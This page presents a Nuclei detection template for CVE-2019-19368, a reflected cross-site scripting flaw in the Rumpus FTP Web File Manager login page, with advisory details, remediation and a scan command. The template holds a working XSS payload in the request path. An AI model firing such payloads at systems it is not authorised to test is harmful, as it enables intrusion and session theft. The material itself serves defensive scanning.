Skip to content

Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting

ID: CVE-2019-19368

Severity: medium

Author: madrobot

Tags: cve,cve2019,xss,ftp,packetstorm,maxum

Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.

id: CVE-2019-19368
info:
name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
author: madrobot
severity: medium
description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to the latest version of Rumpus FTP Web File Manager or apply the vendor-provided patch to mitigate this vulnerability.
reference:
- https://github.com/harshit-shukla/CVE-2019-19368/
- https://www.maxum.com/Rumpus/Download.html
- http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-19368
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-19368
cwe-id: CWE-79
epss-score: 0.00624
epss-percentile: 0.78891
cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: maxum
product: rumpus
tags: cve,cve2019,xss,ftp,packetstorm,maxum
http:
- method: GET
path:
- "{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "value=''><sVg/OnLoAD=alert`1337`//'>"
- type: status
status:
- 200
# digest: 4a0a00473045022100e6905b2f833051bdca9f90852fd713d988bc67649b75b77c2c0ed6ae92a7021902203ef0011f9aa77a7df55e1201f7632b36e1a97b3cb1cea8cdc3595b3b07d7fc42:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-19368.yaml"

View on Github